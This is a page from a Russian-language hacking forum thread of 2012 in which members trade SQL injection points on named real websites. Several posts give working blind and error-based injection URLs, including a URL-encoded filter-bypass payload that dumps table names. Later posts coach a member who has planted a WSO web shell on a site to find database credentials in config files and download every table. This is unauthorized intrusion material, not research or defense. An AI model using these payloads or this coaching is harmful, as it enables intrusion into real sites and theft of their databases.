Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    815
    Reputations:
    848
    Если кавычки не слешируются, то можешь попробывать реализовать полноценную SQL-иньекцию, если файл сможешь прочитать как пхп код, то сможешь реализовать PHP-иньекцию, экспириментируй, все в твоих руках!

    P.S: если не ошибаюсь то кавычки не слешируются...
     
    _________________________
  2. asiaman

    asiaman New Member

    Joined:
    4 Aug 2011
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    У меня вот это никак не крутится ни руками, ни софтом.

    Там вообще есть что-нибудь?

    Code:
    http://develop.belta.by/{тут инъекция, видно через ОПЕРУ}
    структура запроса

    Code:
    GET /1'"1000 HTTP/1.1 
    User-Agent: 1'"2000
    referer: 1'"3000
    client-ip: 1'"4000 
    x-forwarded-for: 1'"5000 
    accept-language: 1'"6000 
    via: 1'"7000 Cookie: PHPSESSID=4f4eba22b01c675b1c8b035f10e977ed 
    Host: develop.belta.by 
    Connection: Keep-alive 
    Accept-Encoding: gzip,deflate
    Это ошибка вываливается в order by?

    Code:
    Ошибка при работе с базой данных.
    Пожалуйста, обратитесь к администратору.
    You have an error in your SQL syntax; check the manual that
     corresponds to your MySQL server version for the right syntax to 
    use near ''''' at line 1
     
    #20122 asiaman, 16 Apr 2012
    Last edited: 16 Apr 2012
  3. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    думаю это было утверждение, нежели вопрос)
    софтом не будет крутится, так как параметра уязвимого нет. Ну по крайней мере с sqlmap я не пробовал такое вытворять
    с order by будет крутиться только если это не error based + 5 версия mysql. В остальных случаях прийдется использовать другие параметры или другой набор слов. Попробуй использовать как параметр phpsessid, то есть сайт/1'&PHPSESSID=значение'
    и суй куда нибудь типа того же sqlmap. может поможет
     
  4. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    315
    Likes Received:
    63
    Reputations:
    66
    Юзабельно ?

    :D

    Code:
    http://www.softclub.ru/games/game.asp?id=11984'
     
  5. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    asiaman
    Скуля там в URI.

    http://develop.belta.by/1'or(substring(version(),1,1)=5)and'1 - TRUE (Главная страница)
    http://develop.belta.by/1'or(substring(version(),1,1)=4)and'1 - FALSE (<##title>)

    Пробелы в такой скуле использовать нельзя, версия меньше, чем 5.1 (нету ф-ции ExtractValue).

    Вывод версии в ошибке:
    http://develop.belta.by/1'or(1,2)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'1
    Duplicate column name '5.0.88-log'

    t3cHn0iD
    Нет.
     
    #20125 Tigger, 16 Apr 2012
    Last edited: 16 Apr 2012
  6. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    843
    Likes Received:
    170
    Reputations:
    84
    union+select +1+--+ не выводит ничего...
     
  7. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    365
    Likes Received:
    188
    Reputations:
    92
    blind

    Code:
    http://www.l-craft.ru/catalog.php?c=38+and+substring(@@version,1,1)=5
     
    1 person likes this.
  8. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    532
    Likes Received:
    61
    Reputations:
    53
    Code:
    http://intersport.ru/company/countries'
    фильтр select и union. как обойти?
     
  9. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108

    URL encode:

    http://www.intersport.ru/products/cat/?cat_group_id=24&cat_producer_id=&id=149+or+1+%67%72%6F%75%70+by+concat(%20(%73%65%6C%65%63%74%20table_name+%66%72%6F%6D+information_schema.tables+limit+17,1),floor(rand(0)*2))%20having%20min(0)--+
    -> 1062Duplicate entry 'banners1' for key 1
     
    1 person likes this.
  10. Sanic1977

    Sanic1977 Banned

    Joined:
    29 Oct 2008
    Messages:
    98
    Likes Received:
    6
    Reputations:
    0
    Помогите, пожалуйста. После после пост запроса email=%5c&pass=451&x=31&y=9 выдается ошибка:

    SQL Error(1064): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\' LIMIT 1' at line
    1.[SELECT * FROM `member_account` WHERE email = '\' LIMIT 1]


    как раскрутить?
     
    #20130 Sanic1977, 16 Apr 2012
    Last edited: 16 Apr 2012
  11. skagen

    skagen Member

    Joined:
    8 Jan 2010
    Messages:
    148
    Likes Received:
    13
    Reputations:
    0
    залил шелл wso на сайт. как теперь можно попасть в phpmyadmin или узнать данные от него? мне нужно скачать все таблицы с сайта
     
  12. Mr.Snuffer

    Mr.Snuffer Member

    Joined:
    2 Jul 2010
    Messages:
    149
    Likes Received:
    13
    Reputations:
    0
    ищи файл с конфигами, или пали обычные файлы.
    Потом либо ищи phpmyadmin, либо коннект прямо из wso
     
  13. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    посмотри в папках есть ли он вобще, просмотри файли на хостинге, в какомто из них должен лежать скрипт для подключения к БД, там ты найдёшь логин пароль и тд. если нет phpmyadmin, то можно написать за 2 минуты простейшый скрипт для слива нужных таблиц,
     
  14. gl0w

    gl0w Member

    Joined:
    31 Dec 2011
    Messages:
    59
    Likes Received:
    21
    Reputations:
    5
    WSO разве не поддерживает дамп определенных таблиц?
    Зачем какие-то скрипты писать...
     
  15. skagen

    skagen Member

    Joined:
    8 Jan 2010
    Messages:
    148
    Likes Received:
    13
    Reputations:
    0
    а как это осуществить? ведь там же нужны логин и пароль для sql базы
     
  16. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    507
    Likes Received:
    105
    Reputations:
    53
    Идёшь в скрипт с которого начинается процесс отдачи статики пользователю. Ищешь там(или в инклюдах) логин и пароль к базе. Заодно посмотри хост куда идёт подключение.
     
  17. skagen

    skagen Member

    Joined:
    8 Jan 2010
    Messages:
    148
    Likes Received:
    13
    Reputations:
    0
    вот я слил файл sql.php http://zalil.ru/33088878

    не пойму где там логин, пароль и имя хоста
     
  18. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    507
    Likes Received:
    105
    Reputations:
    53
    Тебе нужен скрипт настроек, это просто либа с функциями. Ищи файл, в котором происходит инклюд этого скрипта. Выше строки инклюда (хз насколько выше) должен быть или инклюд конфига (посмотри разные вариации слова "настройки" на английском), или сами настройки подключения к бд.
     
  19. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Мде...
    PHP:
    $version='MySQL RST/GHC Manager 2.3';
    $copyright='&copy; RusH Security Team &copy; Antichat edition &copy;';
    Сайт до тебя хекали уже.

    В index.php ищи инклюд конфига или кидай сюда.
     
  20. skagen

    skagen Member

    Joined:
    8 Jan 2010
    Messages:
    148
    Likes Received:
    13
    Reputations:
    0
    почему это хекали? может просто версия базы данных античатовская? или я что то не понимаю? нах в конфиге писать про ачат. про какой индекс ты говоришь? главную страницу сайта? там есть обращение к базе?
     
Loading...
Thread Status:
Not open for further replies.